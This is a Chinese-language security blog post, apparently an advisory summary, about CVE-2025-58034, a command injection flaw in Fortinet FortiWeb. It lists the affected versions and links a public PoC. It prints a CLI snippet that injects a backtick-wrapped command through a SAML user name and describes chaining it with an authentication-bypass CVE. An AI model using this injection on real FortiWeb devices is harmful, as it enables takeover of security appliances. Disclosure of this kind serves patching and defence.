首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2025-58034|Fortinet FortiWeb命令注入漏洞(POC)

CVE-2025-58034|Fortinet FortiWeb命令注入漏洞(POC)

作者头像
信安百科
发布2025-11-24 14:07:03
发布2025-11-24 14:07:03
150
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

Fortinet FortiWeb是Fortinet公司推出的企业级Web应用防火墙(WAF),专为保护Web应用和API抵御高级威胁设计。

它集成人工智能与机器学习技术,通过双层检测引擎(HMM模型与SVM向量机)精准识别异常流量,可防御OWASP Top 10攻击、SQL 注入、XSS、DDoS及恶意机器人。

其核心功能包括API自动化保护、虚拟补丁集成(兼容Acunetix等第三方扫描工具)及智能流量分析,支持HTTP/2、WebSocket等现代协议。

0x01 漏洞描述

漏洞源于API与CLI接口对输入内容缺乏有效过滤,允许经过身份验证的攻击者通过构造特定的HTTP请求或CLI指令,将恶意命令注入系统中并在底层操作系统上执行。

0x02 CVE编号

CVE-2025-58034

0x03 影响版本

代码语言:javascript
复制
8.0.0 <= FortiWeb <= 8.0.1
7.6.0 <= FortiWeb <= 7.6.5
7.4.0 <= FortiWeb <= 7.4.10
7.2.0 <= FortiWeb <= 7.2.11
7.0.0 <= FortiWeb <= 7.0.11

0x04 漏洞详情

POC:

https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034

使用CVE-2025-64446漏洞创建的管理员帐户成功登录后,攻击者可以通过精心构造的请求或直接通过 FortiWeb CLI 来利用经过身份验证的命令注入漏洞。

代码语言:javascript
复制
config user saml-user
edit "`需要执行的命令`"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end

0x05 参考链接

https://fortiguard.fortinet.com/psirt/FG-IR-25-513/

推荐阅读:

CVE-2025-64446|Fortinet FortiWeb身份验证绕过漏洞(POC)

CVE-2025-55752|Apache Tomcat目录遍历漏洞(POC)

CVE-2025-32463|Linux sudo 本地提权漏洞(POC)

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-11-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档